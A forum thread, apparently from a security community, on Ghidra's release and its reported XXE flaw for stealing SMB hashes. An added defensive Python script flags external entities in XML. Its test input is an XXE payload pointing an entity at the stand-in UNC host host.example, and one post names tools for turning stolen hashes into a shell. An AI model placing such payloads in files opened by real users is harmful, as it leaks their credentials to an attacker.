Hey everyone, NSA recently announced the release of a new open source reverse engineering tool called GHIDRA. When the comparison was made with already established tools like IDA Pro, Radare2, etc., GHIDRA stands out as the favourite. I would like to get a comprehensive analysis from anyone who has had access to it before and how it is better.
@3zculprit said:
Hey everyone, NSA recently announced the release of a new open source reverse engineering tool called GHIDRA. When the comparison was made with already established tools like IDA Pro, Radare2, etc., GHIDRA stands out as the favourite. I would like to get a comprehensive analysis from anyone who has had access to it before and how it is better.
. . . NSA . . .
Nahhh. Not even curious. Not worth it.
Well, here is my 2 cents.
It was released and was found to be vulnerable to at least 1 major flaw out of the gate.
One needs to ask themselves did they mean to do that
٩(๏̯͡๏)ゞ?
If you wish, I or anyone here can probably explain to you a little about what they mean by stealing SMB hashes via XXE attacks and what have you, or at least point you to the correct places for research. They may also be able to crack your password if they grab it, as well as use the hash: if you use something like Outlook or Office 365, they may be able to use tools like MailSniper or Ruler to get a shell on the network by just grabbing a user’s hash, so the implications of them hoping to get this on an adversary’s computer are pretty big to me. But hey, I am no conspiracy theorist, but how does the reverse engineering hacker group not know to have a proper XML parser, or know that it could be attacked? That’s like a medium-level challenge here. Does that mean some of us are better than them, or are we expected to think this was an accident?
Either way, keep your PC safe: write your own stuff or use something safe, like the others you mentioned.
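A defensive pre-check for the XXE issue mentioned in the post above, as an added example that is not part of the thread or of Ghidra's code: it lists the DOCTYPE and external entity declarations in an XML file without resolving any of them, and flags system identifiers that point at another host (a UNC path resolved on Windows triggers SMB authentication). The function names, the sample documents and `host.example` are constructed for illustration.

```python
import xml.parsers.expat
from urllib.parse import urlparse


def is_remote(system_id):
    """True if resolving this system identifier would contact another host."""
    if not system_id:
        return False
    if system_id.startswith(("\\\\", "//")):   # UNC path: SMB connection on Windows
        return True
    return bool(urlparse(system_id).netloc)     # file://host/..., http://host/...


def audit_xml(data):
    """Return (kind, name, system_id, remote) for each DTD construct found.

    Only declaration callbacks are registered and no ExternalEntityRefHandler
    is set, so expat reports what the file declares but never fetches it.
    """
    findings = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(("doctype", name, system_id, is_remote(system_id)))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:               # external entity declaration
            findings.append(("external-entity", name, system_id, is_remote(system_id)))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)
    return findings


def safe_to_open(data):
    """Policy: refuse any file that carries a DOCTYPE or is not well-formed."""
    try:
        return not audit_xml(data)
    except xml.parsers.expat.ExpatError:
        return False


# Constructed sample inputs (not taken from any real project file).
BENIGN = b'<?xml version="1.0"?><project name="demo"><file path="a.bin"/></project>'
SUSPECT = (b'<?xml version="1.0"?>\n'
           rb'<!DOCTYPE project [<!ENTITY xxe SYSTEM "\\host.example\share\x">]>'
           b'\n<project>&xxe;</project>')

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, safe_to_open(doc), audit_xml(doc))
```

Files that fail `safe_to_open` are best inspected in a text editor rather than loaded into the tool that would parse them.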
How to use Ghidra problem free:
- Download .exe
- Turn off internet
- Do the ■■■■ you want to do
- Uninstall
!!!
Fear no more of NSA spying.
@pcmhdhp said:
How to use Ghidra problem free:
- Download .exe
- Turn off internet
- Do the ■■■■ you want to do
- Uninstall
!!!
Fear no more of NSA spying.
Use at least a virtual machine for reverse engineering or ideally a separate system. Disconnecting from the internet is a good idea but sometimes not enough. If your system gets owned by your tools or by the code you’re analyzing it will still be owned when you turn your internet back on.
@zaicurity said:
@pcmhdhp said:
How to use Ghidra problem free:
- Download .exe
- Turn off internet
- Do the ■■■■ you want to do
- Uninstall
!!!
Fear no more of NSA spying.
Use at least a virtual machine for reverse engineering or ideally a separate system. Disconnecting from the internet is a good idea but sometimes not enough. If your system gets owned by your tools or by the code you’re analyzing it will still be owned when you turn your internet back on.
That’s true. I’ve met a few pieces of malware in the past that get installed into your system and try to ping back to their host every x minutes, meaning even if you have no internet for the moment of use, and then turn it back on, it will still get owned.